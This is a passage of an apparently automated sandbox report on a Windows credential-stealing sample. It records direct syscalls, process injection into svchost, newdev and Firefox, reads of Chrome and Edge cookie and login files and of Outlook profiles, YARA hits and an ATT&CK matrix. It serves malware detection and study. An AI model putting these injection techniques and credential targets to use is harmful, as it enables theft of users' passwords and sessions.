Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]	2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]	2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]	2_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]	2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]	2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]	2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]	2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]	2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]	2_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]	2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]	2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]	2_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]	2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]	2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]	2_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]	2_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]	2_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]	2_2_03CBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]	2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]	2_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]	2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]	2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]	2_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]	2_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6870 mov eax, dword ptr fs:[00000030h]	2_2_03CC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC6870 mov eax, dword ptr fs:[00000030h]	2_2_03CC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBC810 mov eax, dword ptr fs:[00000030h]	2_2_03CBC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]	2_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]	2_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]	2_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52835 mov ecx, dword ptr fs:[00000030h]	2_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]	2_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]	2_2_03C52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6A830 mov eax, dword ptr fs:[00000030h]	2_2_03C6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD483A mov eax, dword ptr fs:[00000030h]	2_2_03CD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD483A mov eax, dword ptr fs:[00000030h]	2_2_03CD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]	2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03C2EFD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]	2_2_03C2EFD8

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FD80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00FD80A9

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FAA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00FAA155
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FAA124 SetUnhandledExceptionFilter,		0_2_00FAA124

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\newdev.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\newdev.exe

Thread register set: target process: 3620

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\newdev.exe

Thread APC queued: target process: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Writes to foreign memory regions

Source: C:\Users\user\Desktop\psibx9rXra.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 3189008

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FD87B1 LogonUserW,

0_2_00FD87B1

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F83B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F83B3A

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F848D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00F848D7

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FE4C7F mouse_event,

0_2_00FE4C7F

Source: C:\Users\user\Desktop\psibx9rXra.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\psibx9rXra.exe"	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FD7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00FD7CAF

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FD874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00FD874B

Source: psibx9rXra.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: psibx9rXra.exe, GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: GFwdSeXZEVUZM.exe, 00000004.00000002.3454712178.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000004.00000000.2416657979.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, GFwdSeXZEVUZM.exe, 00000007.00000002.3454609792.00000000016E1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FA862B cpuid

0_2_00FA862B

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FB4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00FB4E87

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FC1E06 GetUserNameW,

0_2_00FC1E06

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FB3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00FB3F3A

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F849A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F849A0

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\newdev.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: psibx9rXra.exe	Binary or memory string: WIN_81
Source: psibx9rXra.exe	Binary or memory string: WIN_XP
Source: psibx9rXra.exe	Binary or memory string: WIN_XPe
Source: psibx9rXra.exe	Binary or memory string: WIN_VISTA
Source: psibx9rXra.exe	Binary or memory string: WIN_7
Source: psibx9rXra.exe	Binary or memory string: WIN_8
Source: psibx9rXra.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FF6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00FF6283
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FF6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00FF6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
